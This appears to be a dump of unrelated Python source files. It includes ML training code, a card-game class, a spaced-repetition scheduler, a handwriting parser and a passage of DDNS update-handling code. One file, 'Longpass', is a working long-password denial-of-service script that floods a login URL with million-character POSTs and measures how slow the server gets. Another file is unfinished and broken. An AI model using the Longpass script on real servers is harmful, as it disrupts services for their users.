text stringlengths 38 1.54M |
|---|
i = 0
data = (['1',1.0,1.0],['2',1.5,2.0],
['3',3.0,4.0],['4',5.0,7.0],
['5',3.5,5.0],['6',4.5,5.0],
['7',3.5,4.5])
def tampil_data(data):
for data in i :
print data[i]
def banyak_data(data):
n = 0
for data in i:
n = n+1
return n
def random(awal,akhir):
angka='0123456789'
pos_ang=(awal,akhir).random()
return pos_ang
def x(data1,c_1,data2,c_2):
bil_awal=
print(tampil_data(data))
|
#!/usr/bin/env python3
import logging
import sys
logging.debug(str(sys.version_info))
if sys.version_info[0] < 3 or sys.version_info[1] < 5:
raise Exception("Requires python 3.5+, try module load python/3.6-anaconda-4.4")
import readline
def ask(prompt:str, guess:str="", insist=True) -> str:
""" ask the user for some information, maybe with a guess to accept """
readline.set_startup_hook(lambda: readline.insert_text(guess))
try:
retval = ''
while retval == '':
retval = input(prompt)
if not insist:
break
finally:
readline.set_startup_hook()
return retval
from typing import List
def select(prompt:str, options:List, *additional:str) -> str:
""" ask the user to choose an option from a list (by number), or
one of the provided additional options
"""
print(prompt)
if len(options) == 0:
print("(nothing available)")
logging.debug("selecting from: " + str(options))
for i in range(len(options)):
logging.debug("option {0} is {1}".format(str(i), str(options[i])))
print("{0:>3d}: {1}".format(i+1, str(options[i])))
print("Selection: ")
while True:
choice = input()
if choice in additional:
return choice
try:
ichoice = int(choice)
except ValueError:
# user put something invalid, trigger a retry
ichoice = 0
# offset back to 0:
ichoice -= 1
if ichoice >= 0 and ichoice < len(options):
#return ichoice
return options[ichoice]
choices = ', '.join([c for c in additional])
print("Not a valid selection, please select a number from the list above or one of: " + choices)
def multi_select(prompt:str, options:List, *additional:str) -> List[str]:
""" ask the user to choose options by number, and accept multiple options
as a space-separated list
"""
print(prompt)
for i in range(len(options)):
print("{0:>3d}: {1}".format(i+1, str(options[i])))
print("To select multiple items, please use spaces to separate them")
print("Selections: ")
while True:
result = []
choices = input().split()
for choice in choices:
if choice in additional:
result.append(choice)
continue
ichoice = int(choice)
if ichoice >= 1 and ichoice <= len(options)+1:
#result.append(ichoice-1)
result.append(options[ichoice-1])
continue
print("{0} is not a valid selection, please try again".format(choice))
break
else:
return result # all were valid
def truefalse(prompt, default=False):
readline.set_startup_hook(lambda: readline.insert_text(str(default)))
guess = 'Y' if default else 'N'
try:
while True:
response = input(prompt)
if response.lower() in ('yes', 'y', 'true', 't'):
retval = True
break
elif response.lower() in ('no', 'n', 'false', 'f'):
retval = False
break
else:
prompt = "invalid response, please enter Y or N"
return retval
finally:
readline.set_startup_hook()
|
# Copyright (c) Alibaba, Inc. and its affiliates.
from modelscope.trainers.hooks import HOOKS, Priority
from modelscope.trainers.hooks.lr_scheduler_hook import LrSchedulerHook
from modelscope.utils.constant import LogKeys
@HOOKS.register_module(module_name='AddLrLogHook')
class AddLrLogHook(LrSchedulerHook):
"""For EasyCV to adapt to ModelScope, the lr log of EasyCV is added in the trainer,
but the trainer of ModelScope does not and it is added in the lr scheduler hook.
But The lr scheduler hook used by EasyCV is the hook of mmcv, and there is no lr log.
It will be deleted in the future.
"""
PRIORITY = Priority.NORMAL
def __init__(self):
pass
def before_run(self, trainer):
pass
def before_train_iter(self, trainer):
trainer.log_buffer.output[LogKeys.LR] = self._get_log_lr(trainer)
def before_train_epoch(self, trainer):
trainer.log_buffer.output[LogKeys.LR] = self._get_log_lr(trainer)
def after_train_epoch(self, trainer):
pass
|
import torch
import torchvision
import torchvision.transforms as transforms
import math
import matplotlib.pyplot as plt
import numpy as np
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import os
cfg = {
'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
}
def load_data(DATA_PATH,BATCH_SIZE):
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
transform = transforms.Compose([
transforms.Resize(512),
transforms.RandomSizedCrop(256),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,])
trainset = torchvision.datasets.CIFAR10(root=DATA_PATH, train=True,
download=True, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=BATCH_SIZE,
shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root=DATA_PATH, train=False,
download=False, transform=transform)
testloader = torch.utils.data.DataLoader(testset, batch_size=BATCH_SIZE,
shuffle=False, num_workers=2)
return trainloader,testloader
## Dataloader
# functions to show an image
def imgshow(img):
img = img / 2 + 0.5 # unnormalize
npimg = img.numpy()
plt.imshow(np.transpose(npimg, (1, 2, 0)))
plt.show()
class VGG(nn.Module):
def __init__(self,feature,num_classes=1000,init_weights=True):
super(VGG,self).__init__()
self.feature=feature
self.classfier=nn.Sequential(
#FC-4096
nn.Linear(512*7*7,4096),
# nn.ReLU(inplace=True)
nn.LeakyReLU(inplace=True),
nn.Dropout(),
#FC-4096
nn.Linear(4096,4096),
nn.ReLU(True),
nn.Dropout(),
#FC-1000
nn.Linear(4096,num_classes),
)
if init_weights:
self._initialize_weights()
def _initialize_weights(self):
for m in self.modules():
print(m,'\n')
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
print('conv2d:\n',m.weight.data)
m.weight.data.normal_(0, math.sqrt(2. / n))
print('Modified conv2d:\n',m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
print('BN:\n',m.weight.data)
m.weight.data.fill_(1)
m.bias.data.zero_()
print('Modified BN:\n',m.weight.data)
elif isinstance(m, nn.Linear):
print('Linear:\n',m.weight.data)
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
print('Modified Linear:\n',m.weight.data)
def forward(self,x):
x=self.feature(x)
x=x.view(x.size(0),-1)
x=self.classfier(x)
return x
def layerbuild(cfg,batch_normal=False,in_channels=3,layer=[]):
"""
cfg: config dictionary
"""
assert cfg!=None,'Invalid CFG Info'
for layer_config in cfg:
if layer_config=='M':
layer.append(nn.MaxPool2d(kernel_size=3,stride=2))
else:
conv2d=nn.Conv2d(in_channels,layer_config,kernel_size=3,padding=1)
if batch_normal:
layer.append(conv2d)
layer.append(nn.BatchNorm2d(layer_config))
layer.append(nn.ReLU(inplace=True))
else:
layer.append(conv2d)
layer.append(nn.ReLU(inplace=True))
in_channels=layer_config
return nn.Sequential(*layer)
def vgg16_bn(**kwargs):
print(cfg['D'])
model = VGG(layerbuild(cfg['D'], batch_normal=True), **kwargs)
return model
def train(traindata,testdata,LearningRate=0.1):
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
use_cuda = torch.cuda.is_available()
global best
criterion=nn.CrossEntropyLoss()
model=vgg16_bn()
model.train()
optimizer=optim.SGD(model.parameters(),lr=LearningRate)
model.cuda(device=0)
for batch_id ,(inputs,labels) in enumerate(traindata):
print('Batch : No .',batch_id,'\n')
inputs, labels = inputs.cuda(), labels.cuda(async=True)
inputs, labels = torch.autograd.Variable(inputs), torch.autograd.Variable(labels)
print(inputs.shape)
#Model INPUT Size :
outputs=model(inputs)
loss=criterion(outputs,labels)
losscpu=loss.cpu()
print('loss',losscpu)
# prec1,prec5=accura
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
def main():
classes = ('plane', 'car', 'bird', 'cat','deer', 'dog', 'frog', 'horse', 'ship', 'truck')
DataPath='/run/user/1000/gvfs/smb-share:server=192.168.31.1,share=xiaomi-usb0/DataSet/'
Batch_Size=4
trainloader,testloader=load_data(DataPath,Batch_Size)
# # get some random training images
# dataiter = iter(trainloader)
# images, labels = dataiter.next()
# # show images
# # print labels
# print(' '.join('%5s' % classes[labels[j]] for j in range(BATCH_SIZE)),'\n')
# imgshow(torchvision.utils.make_grid(images))
# net16=vgg16_bn()
# # print(net16)
train(trainloader,testloader)
if __name__ == '__main__':
main()
|
HAND_LIMIT = 10
class Hand(object):
"""Hand of cards."""
def __init__(self):
self.side = None
self.cards = []
self.size = 0
self.board = None
self.hidden = False
def get_card(self, pos):
"""Return the card at the pos (idx+1) specified."""
return self.cards[pos-1]
def get_playable_cards(self):
"""Return a list of the cards that can be played."""
playableCards = []
for card in self.cards:
if card.can_play():
playableCards.append(card)
return playableCards
def get_playable_card_positions(self):
"""Return the position (idx+1) of the cards that can be played."""
playableCardPos = []
for i, card in enumerate(self.cards):
if card.can_play():
playableCardPos.append(i+1)
return playableCardPos
def add_card(self, card):
"""A 'card' is either a Spell, Weapon, or Character."""
if len(self.cards) >= HAND_LIMIT:
raise Exception("Too many Cards.")
self.cards.append(card)
self.size += 1
card.hand = self
def remove_card(self, card):
if card not in self.cards:
raise Exception("%s not in this hand. %s" % (card.name, str(self)))
self.cards.remove(card)
self.size -= 1
def is_full(self):
return self.size >= HAND_LIMIT
def __str__(self):
if not len(self.cards):
return "Empty"
out = ""
if self.hidden:
for card in self.cards:
out += "| ??? |"
else:
for card in self.cards:
if card.can_play():
out += "*"
out += "|{%d} %s| " % (card.contents.manaCost, card.contents.name)
return out
|
import platform
import requests
print(platform.platform())
"""response = requests.get("https://www.zhihu.com")
print(type(response))
print(response.status_code)
print(type(response.text))
print(response.text)
print(response.cookies)
print(response.content)
print(response.content.decode("utf-8"))
response.encoding="utf-8"
print(response.text)
"""
import requests
import json
response = requests.get("https://httpbin.org/get")
print(type(response.text))
print(response.json())
print(json.loads(response.text))
print(type(response.json())) |
from agente.agente import Agente
from modelos.card import Card
from modelos.estudo import Estudo
from modelos.respostausuario import RespostaUsuario
from datetime import datetime
from datetime import timedelta
from modelos_matematicos.formula_repeticao.formula_repeticao import calcular_oi
class Ambiente:
__agente__: Agente
def __init__(self):
self.__agente__ = Agente()
def obter_proxima_repeticao(self, api_object):
resposta_usuario = RespostaUsuario(
api_object['timeForResolution'],
api_object['isRight']
)
estudo_corrente = Estudo(
Card(
api_object['card']['id'],
api_object['card']['difficulty'],
api_object['card']['tag']['id']
),
datetime.strptime(api_object['lastRepetition'], '%b %d, %Y %I:%M:%S %p'),
datetime.strptime(api_object['currentDate'], '%b %d, %Y %I:%M:%S %p'),
api_object['numberOfRepetitions'],
False,
api_object['isRight']
)
id_estudante = api_object['student']['id']
recompensa = None
if estudo_corrente.numero_repeticao is not 1:
recompensa = self.__calcular_recompensa__(resposta_usuario, estudo_corrente)
novo_ef = self.__agente__.tomar_acao(id_estudante, recompensa, estudo_corrente)
proxima_repeticao = self.__calcular_proxima_repeticao__(estudo_corrente)
estudo_completado = self.__verificar_estudo_completado__(estudo_corrente.data_ultima_repeticao, proxima_repeticao)
return {
"card": {
"id": estudo_corrente.card.id,
"difficulty": novo_ef,
},
"completed": estudo_completado,
"nextRepetition": proxima_repeticao.strftime("%b %d, %Y %I:%M:%S %p"),
}
def __calcular_recompensa__(self, resposta: RespostaUsuario, estudo_corrente: Estudo):
if resposta.acerto is False:
return -1
else:
intervalo = (estudo_corrente.data_proxima_repeticao - estudo_corrente.data_ultima_repeticao).days
repeticao = estudo_corrente.numero_repeticao
tempo_resposta = resposta.tempo_resposta
recompensa = round((intervalo * (repeticao / tempo_resposta)), 5)
return recompensa
def __calcular_proxima_repeticao__(self, estudo: Estudo):
if estudo.acerto_ultima_repeticao is False: # Caso o usuário tenha errado a pergunta
# A próxima repetição será agendada para o próximo dia
return datetime.now() + timedelta(days=1)
else: # Caso o usuário tenha acertado
ef = estudo.card.ef # O ef não é alterado, é apenas utilizado para ser passado de parâmetro
# A próxima repetição será agendada conforme a diferença entre os intervalos das repetições R e R-1
diferenca_em_dias = self.__calcular_intervalo_em_dias__(ef, estudo.numero_repeticao)
return datetime.now() + diferenca_em_dias
def __calcular_intervalo_em_dias__(self, ef: float, repeticao: int):
if repeticao is 1:
return calcular_oi(ef, repeticao)
else:
return calcular_oi(ef, repeticao) - calcular_oi(ef, repeticao - 1)
def __verificar_estudo_completado__(self, ultima_repeticao, proxima_repeticao):
completado = (proxima_repeticao - ultima_repeticao).days >= 730
return completado
def __montar_resposta__(self, novo_ef, data_proxima_repeticao, estudo_foi_completado):
return {
"card":{
"difficulty": novo_ef
},
"nextRepetition": data_proxima_repeticao.strftime("%b %d, %Y %I:%M:%S %p"),
"completed": estudo_foi_completado
} |
import sys
import asyncio
import aiohttp
import time
from random import choice
from string import ascii_letters
from termcolor import colored
class Longpass:
url = ""
delay = 1
username = ""
size = 1000000
repeats = 20
password = ""
iterations = 0
tasks = list()
payload = dict()
response_time = 0
ui = list()
def run(self):
# Generate the password
self.updateUI(2, "Generating the password...")
password = self.generatePassword(self.size)
self.updateUI(2, "Done!\n")
# Set the POST payload
# @todo Add an ability to set a custom variable name for the "password" DOS payload variable
#self.payload = { 'username': self.username, 'password': password }
self.payload['password'] = password
#self.updateUI(0, password) # debug
password = None
# Event loop that waits for tasks to complete
loop = asyncio.get_event_loop()
# Add requests to the task list
for i in range(self.repeats):
delay = i * self.delay
self.updateUI((i+4), colored("Request " + str(i+1) + ": Scheduled...", 'grey'))
self.tasks.append(self.makeRequest(delay, i, loop))
# Run the loop until every task is complete
loop.run_until_complete(asyncio.wait(self.tasks))
#loop.run_until_complete(self.shootTasks())
# Close the loop
loop.close()
def generatePassword(self, size):
# Generate password
return "".join(choice(ascii_letters) for i in range(size))
def clear(self):
# Clear screen, return cursor to top left
sys.stdout.write('\033[2J')
sys.stdout.write('\033[H')
sys.stdout.flush()
def updateUI(self, position, txt):
# Set the UI dict line, EAFP style
try:
self.ui[position] = txt
except IndexError:
self.ui.insert(position, txt)
self.clear()
for msg in self.ui:
sys.stdout.write(msg + "\n")
def progress(self,step):
# Add step to progress
self.iterations += step
color = 'white'
# Set warning colors for server response time
if self.response_time <= 5:
color = 'white'
if self.response_time >= 6:
color = 'yellow'
if self.response_time >= 20:
color = 'red'
percentage = colored("\n" + str(round((self.iterations / (self.repeats * 2)) * 100, 1)) + "% done", 'white', attrs=['bold']) + " - "
response = "Server response time: "+ colored(str(round(self.response_time, 4)), color, attrs=['bold']) +" sec"
progress = percentage + response
self.updateUI(self.repeats + 3, progress)
async def makeRequest(self, delay, i, loop):
"""
Make an asynchronous POST request
"""
# Wait until it's time
await asyncio.sleep(delay)
# UI line position
position = 3 + i
# Request id for UI
id = "Request " + str(i+1)
self.updateUI(position, colored(id + ": Sending request...", 'yellow'))
# Add to iteration counter
self.progress(1)
# Measure time
start = time.time()
# The actual request
try:
response = await aiohttp.post(self.url, data = self.payload)
except Exception as e:
self.clear()
exit(colored(e, 'red'))
# Response debug
#self.updateUI(50, await response.text())
# Add to iteration counter
self.progress(1)
# Request response time
duration = time.time() - start
self.response_time = duration
# Display the progress
self.updateUI(position, colored(id + ": Done, server response time " + str(round(duration, 2)) + " seconds.", 'green', attrs=['bold']))
# Close the connection
response.close()
|
from xml.dom.minidom import parse
import matplotlib.pyplot as plt
def getCorner(xmlParse, cornerName):
corner = xmlParse.getElementsByTagName(cornerName)[0]
cornerCoord = []
cornerCoord.append(float(corner.getAttribute('x')))
cornerCoord.append(float(corner.getAttribute('y')))
return cornerCoord
def minusCoords(coord1, coord2):
res = []
res.append(coord1[0] - coord2[0])
res.append(coord1[1] - coord2[1])
return res
def getLineStroke(xmlFileName):
# print "reading line stroke from xml file", xmlFileName.split('/')[-1]
xmlParse = parse(xmlFileName);
#descrip = xmlParse.getElementsByTagName('WhiteboardDescription')[0]
#print descrip.childNodes
loc = xmlParse.getElementsByTagName('SensorLocation')[0].getAttribute('corner')
#print loc
assert loc == 'top_left'
bot_right = getCorner(xmlParse, 'DiagonallyOppositeCoords')
bot_left = getCorner(xmlParse, 'VerticallyOppositeCoords')
top_right = getCorner(xmlParse, 'HorizontallyOppositeCoords')
#print bot_right, bot_left, top_right;
top_left = [];
top_left.append(bot_left[0])
top_left.append(top_right[1])
#print top_left
inputSeq = []
#plotSeq = []
for stroke in xmlParse.getElementsByTagName('Stroke'):
for point in stroke.getElementsByTagName('Point'):
curCoord = []
curCoord.append(float(point.getAttribute('x')))
curCoord.append(float(point.getAttribute('y')))
#print curCoord
curCoord[0] = curCoord[0] - bot_left[0] # start from 0
curCoord[1] = bot_right[1] - curCoord[1] # up down inverse
#print curCoord
#plotSeq.append(curCoord)
curCoord.append(0)
inputSeq.append(curCoord)
inputSeq[-1][-1] = 1
#return [inputSeq, plotSeq]
return inputSeq
if __name__ == '__main__':
testXml = "/home/lau/homework/IAM_OnDB/lineStrokes/a01/a01-000/a01-000u-05.xml"
#[inputs, plotSeq] = getLineStroke(testXml)
inputs = getLineStroke(testXml)
ofile = open("testOut.txt", 'w')
for point in inputs:
print >> ofile, point
x = []
y = []
plt.figure(1)
plt.xlim(0, 7000)
plt.ylim(0, 7000)
for line in inputs:
x.append(line[0])
y.append(line[1])
if line[2] == 1:
plt.plot(x, y, 'k')
x = []
y = []
plt.show()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from time import time
def test():
t = time()
lista=[1,2,3,4,5,6,7,8,9,13,34,53,42,44]
listb=[2,4,6,9,23]
intersection=[]
for i in range (1000000):
for a in lista:
for b in listb:
if a == b:
intersection.append(a)
print "list in func(test), total run time:", time()-t
def test_set():
t = time()
lista=[1,2,3,4,5,6,7,8,9,13,34,53,42,44]
listb=[2,4,6,9,23]
intersection=[]
for i in range(1000000):
intersection.append(list(set(lista)&set(listb)))
print "set in func(test_set), total run time:", time()-t
t = time()
lista=[1,2,3,4,5,6,7,8,9,13,34,53,42,44]
listb=[2,4,6,9,23]
intersection=[]
for i in range (1000000):
for a in lista:
for b in listb:
if a == b:
intersection.append(a)
print "list not in func, total run time:", time()-t
##runtime(db6sda8_python2.6.6: 19.9267392159)
t = time()
lista=[1,2,3,4,5,6,7,8,9,13,34,53,42,44]
listb=[2,4,6,9,23]
intersection=[]
for i in range(1000000):
intersection.append(list(set(lista)&set(listb)))
print "set not in func, total run time:", time()-t
#runtime(db6sda8_python2.6.6: 5.93210506439)
test()
###runtime(db6sda8_python2.6.6: 10.7789461613)
test_set()
###runtime(db6sda8_python2.6.6: 7.41557717323)
|
# Copyright (C) 2012 Internet Systems Consortium.
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SYSTEMS CONSORTIUM
# DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# INTERNET SYSTEMS CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING
# FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
# WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from bundy.dns import *
import bundy.ddns.zone_config
from bundy.log import *
from bundy.ddns.logger import logger, ClientFormatter, ZoneFormatter,\
RRsetFormatter
from bundy.log_messages.libddns_messages import *
from bundy.datasrc import ZoneFinder
import bundy.xfrin.diff
from bundy.acl.acl import ACCEPT, REJECT, DROP
import copy
# Result codes for UpdateSession.handle()
UPDATE_SUCCESS = 0
UPDATE_ERROR = 1
UPDATE_DROP = 2
# Convenient aliases of update-specific section names
SECTION_ZONE = Message.SECTION_QUESTION
SECTION_PREREQUISITE = Message.SECTION_ANSWER
SECTION_UPDATE = Message.SECTION_AUTHORITY
# Shortcut
DBGLVL_TRACE_BASIC = logger.DBGLVL_TRACE_BASIC
class UpdateError(Exception):
'''Exception for general error in update request handling.
This exception is intended to be used internally within this module.
When UpdateSession.handle() encounters an error in handling an update
request it can raise this exception to terminate the handling.
This class is constructed with some information that may be useful for
subsequent possible logging:
- msg (string) A string explaining the error.
- zname (bundy.dns.Name) The zone name. Can be None when not identified.
- zclass (bundy.dns.RRClass) The zone class. Like zname, can be None.
- rcode (bundy.dns.RCode or None) The RCODE to be set in the response
message; this can be None if the response is not expected to be sent.
- nolog (bool) If True, it indicates there's no more need for logging.
'''
def __init__(self, msg, zname, zclass, rcode, nolog=False):
Exception.__init__(self, msg)
self.zname = zname
self.zclass = zclass
self.rcode = rcode
self.nolog = nolog
def foreach_rr(rrset):
'''
Generator that creates a new RRset with one RR from
the given RRset upon each iteration, usable in calls that
need to loop over an RRset and perform an action with each
of the individual RRs in it.
Example:
for rr in foreach_rr(rrset):
print(str(rr))
'''
for rdata in rrset.get_rdata():
rr = bundy.dns.RRset(rrset.get_name(),
rrset.get_class(),
rrset.get_type(),
rrset.get_ttl())
rr.add_rdata(rdata)
yield rr
def convert_rrset_class(rrset, rrclass):
'''Returns a (new) rrset with the data from the given rrset,
but of the given class. Useful to convert from NONE and ANY to
a real class.
Note that the caller should be careful what to convert;
and DNS error that could happen during wire-format reading
could technically occur here, and is not caught by this helper.
'''
new_rrset = bundy.dns.RRset(rrset.get_name(), rrclass,
rrset.get_type(), rrset.get_ttl())
for rdata in rrset.get_rdata():
# Rdata class is nof modifiable, and must match rrset's
# class, so we need to to some ugly conversion here.
# And we cannot use to_text() (since the class may be unknown)
wire = rdata.to_wire(bytes())
new_rrset.add_rdata(bundy.dns.Rdata(rrset.get_type(), rrclass, wire))
return new_rrset
def collect_rrsets(collection, rrset):
'''
Helper function to collect similar rrsets.
Collect all rrsets with the same name, class, and type
collection is the currently collected list of RRsets,
rrset is the RRset to add;
if an RRset with the same name, class and type as the
given rrset exists in the collection, its rdata fields
are added to that RRset. Otherwise, the rrset is added
to the given collection.
TTL is ignored.
This method does not check rdata contents for duplicate
values.
The collection and its rrsets are modified in-place,
this method does not return anything.
'''
found = False
for existing_rrset in collection:
if existing_rrset.get_name() == rrset.get_name() and\
existing_rrset.get_class() == rrset.get_class() and\
existing_rrset.get_type() == rrset.get_type():
for rdata in rrset.get_rdata():
existing_rrset.add_rdata(rdata)
found = True
if not found:
collection.append(rrset)
class DDNS_SOA:
'''Class to handle the SOA in the DNS update '''
def __get_serial_internal(self, origin_soa):
'''Get serial number from soa'''
return Serial(int(origin_soa.get_rdata()[0].to_text().split()[2]))
def __write_soa_internal(self, origin_soa, soa_num):
'''Write back serial number to soa'''
new_soa = RRset(origin_soa.get_name(), origin_soa.get_class(),
RRType.SOA, origin_soa.get_ttl())
soa_rdata_parts = origin_soa.get_rdata()[0].to_text().split()
soa_rdata_parts[2] = str(soa_num.get_value())
new_soa.add_rdata(Rdata(origin_soa.get_type(), origin_soa.get_class(),
" ".join(soa_rdata_parts)))
return new_soa
def soa_update_check(self, origin_soa, new_soa):
'''Check whether the new soa is valid. If the serial number is bigger
than the old one, it is valid, then return True, otherwise, return
False. Make sure the origin_soa and new_soa parameters are not none
before invoke soa_update_check.
Parameters:
origin_soa, old SOA resource record.
new_soa, new SOA resource record.
Output:
if the serial number of new soa is bigger than the old one, return
True, otherwise return False.
'''
old_serial = self.__get_serial_internal(origin_soa)
new_serial = self.__get_serial_internal(new_soa)
if(new_serial > old_serial):
return True
else:
return False
def update_soa(self, origin_soa, inc_number = 1):
''' Update the soa number incrementally as RFC 2136. Please make sure
that the origin_soa exists and not none before invoke this function.
Parameters:
origin_soa, the soa resource record which will be updated.
inc_number, the number which will be added into the serial number of
origin_soa, the default value is one.
Output:
The new origin soa whoes serial number has been updated.
'''
soa_num = self.__get_serial_internal(origin_soa)
soa_num = soa_num + inc_number
if soa_num.get_value() == 0:
soa_num = soa_num + 1
return self.__write_soa_internal(origin_soa, soa_num)
class UpdateSession:
'''Protocol handling for a single dynamic update request.
This class is instantiated with a request message and some other
information that will be used for handling the request. Its main
method, handle(), will process the request, and normally build
a response message according to the result. The application of this
class can use the message to send a response to the client.
'''
def __init__(self, req_message, client_addr, zone_config):
'''Constructor.
Parameters:
- req_message (bundy.dns.Message) The request message. This must be
in the PARSE mode, its Opcode must be UPDATE, and must have been
TSIG validatd if it's TSIG signed.
- client_addr (socket address) The address/port of the update client
in the form of Python socket address object. This is mainly for
logging and access control.
- zone_config (ZoneConfig) A tentative container that encapsulates
the server's zone configuration. See zone_config.py.
'''
self.__message = req_message
self.__tsig = req_message.get_tsig_record()
self.__client_addr = client_addr
self.__zone_config = zone_config
self.__added_soa = None
def get_message(self):
'''Return the update message.
After handle() is called, it's generally transformed to the response
to be returned to the client. If the request has been dropped,
this method returns None. If this method is called before handle()
the return value would be identical to the request message passed on
construction, although it's of no practical use.
'''
return self.__message
def handle(self):
'''Handle the update request according to RFC2136.
This method returns a tuple of the following elements that
indicate the result of the request.
- Result code of the request processing, which are:
UPDATE_SUCCESS Update request granted and succeeded.
UPDATE_ERROR Some error happened to be reported in the response.
UPDATE_DROP Error happened and no response should be sent.
Except the case of UPDATE_DROP, the UpdateSession object will have
created a response that is to be returned to the request client,
which can be retrieved by get_message(). If it's UPDATE_DROP,
subsequent call to get_message() returns None.
- The name of the updated zone (bundy.dns.Name object) in case of
UPDATE_SUCCESS; otherwise None.
- The RR class of the updated zone (bundy.dns.RRClass object) in case
of UPDATE_SUCCESS; otherwise None.
- The name of the used data source associated with DataSourceClient
in case of UPDATE_SUCCESS; otherwise None.
'''
try:
self._get_update_zone()
# Contrary to what RFC2136 specifies, we do ACL checks before
# prerequisites. It's now generally considered to be a bad
# idea, and actually does harm such as information
# leak. It should make more sense to prevent any security issues
# by performing ACL check as early as possible.
self.__check_update_acl(self.__zname, self.__zclass)
self._create_diff()
prereq_result = self.__check_prerequisites()
if prereq_result != Rcode.NOERROR:
self.__make_response(prereq_result)
return UPDATE_ERROR, self.__zname, self.__zclass, None
update_result = self.__do_update()
if update_result != Rcode.NOERROR:
self.__make_response(update_result)
return UPDATE_ERROR, self.__zname, self.__zclass, None
self.__make_response(Rcode.NOERROR)
datasrc_name = self.__datasrc_client.get_datasource_name()
return UPDATE_SUCCESS, self.__zname, self.__zclass, datasrc_name
except UpdateError as e:
if not e.nolog:
logger.debug(logger.DBGLVL_TRACE_BASIC,
LIBDDNS_UPDATE_PROCESSING_FAILED,
ClientFormatter(self.__client_addr, self.__tsig),
ZoneFormatter(e.zname, e.zclass), e)
# If RCODE is specified, create a corresponding resonse and return
# ERROR; otherwise clear the message and return DROP.
if e.rcode is not None:
self.__make_response(e.rcode)
return UPDATE_ERROR, None, None, None
self.__message = None
return UPDATE_DROP, None, None, None
except bundy.datasrc.Error as e:
logger.error(LIBDDNS_DATASRC_ERROR,
ClientFormatter(self.__client_addr, self.__tsig), e)
self.__make_response(Rcode.SERVFAIL)
return UPDATE_ERROR, None, None, None
def _get_update_zone(self):
'''Parse the zone section and find the zone to be updated.
If the zone section is valid and the specified zone is found in
the configuration, sets private member variables for this session:
__datasrc_client: A matching data source that contains the specified
zone
__zname: The zone name as a Name object
__zclass: The zone class as an RRClass object
If this method raises an exception, these members are not set.
Note: This method is protected for ease of use in tests, where
methods are tested that need the setup done here without calling
the full handle() method.
'''
# Validation: the zone section must contain exactly one question,
# and it must be of type SOA.
n_zones = self.__message.get_rr_count(SECTION_ZONE)
if n_zones != 1:
raise UpdateError('Invalid number of records in zone section: ' +
str(n_zones), None, None, Rcode.FORMERR)
zrecord = self.__message.get_question()[0]
if zrecord.get_type() != RRType.SOA:
raise UpdateError('update zone section contains non-SOA',
None, None, Rcode.FORMERR)
# See if we're serving a primary zone specified in the zone section.
zname = zrecord.get_name()
zclass = zrecord.get_class()
zone_type, datasrc_client = self.__zone_config.find_zone(zname, zclass)
if zone_type == bundy.ddns.zone_config.ZONE_PRIMARY:
self.__datasrc_client = datasrc_client
self.__zname = zname
self.__zclass = zclass
return
elif zone_type == bundy.ddns.zone_config.ZONE_SECONDARY:
# We are a secondary server; since we don't yet support update
# forwarding, we return 'not implemented'.
logger.debug(DBGLVL_TRACE_BASIC, LIBDDNS_UPDATE_FORWARD_FAIL,
ClientFormatter(self.__client_addr, self.__tsig),
ZoneFormatter(zname, zclass))
raise UpdateError('forward', zname, zclass, Rcode.NOTIMP, True)
# zone wasn't found
logger.debug(DBGLVL_TRACE_BASIC, LIBDDNS_UPDATE_NOTAUTH,
ClientFormatter(self.__client_addr, self.__tsig),
ZoneFormatter(zname, zclass))
raise UpdateError('notauth', zname, zclass, Rcode.NOTAUTH, True)
def _create_diff(self):
'''
Initializes the internal data structure used for searching current
data and for adding and deleting data. This is supposed to be called
after ACL checks but before prerequisite checks (since the latter
needs the find calls provided by the Diff class).
Adds the private member:
__diff: A buffer of changes made against the zone by this update
This object also contains find() calls, see documentation
of the Diff class.
Note: This method is protected for ease of use in tests, where
methods are tested that need the setup done here without calling
the full handle() method.
'''
self.__diff = bundy.xfrin.diff.Diff(self.__datasrc_client,
self.__zname,
journaling=True,
single_update_mode=True)
def __check_update_acl(self, zname, zclass):
'''Apply update ACL for the zone to be updated.'''
acl = self.__zone_config.get_update_acl(zname, zclass)
action = acl.execute(bundy.acl.dns.RequestContext(
(self.__client_addr[0], self.__client_addr[1]), self.__tsig))
if action == REJECT:
logger.info(LIBDDNS_UPDATE_DENIED,
ClientFormatter(self.__client_addr, self.__tsig),
ZoneFormatter(zname, zclass))
raise UpdateError('rejected', zname, zclass, Rcode.REFUSED, True)
if action == DROP:
logger.info(LIBDDNS_UPDATE_DROPPED,
ClientFormatter(self.__client_addr, self.__tsig),
ZoneFormatter(zname, zclass))
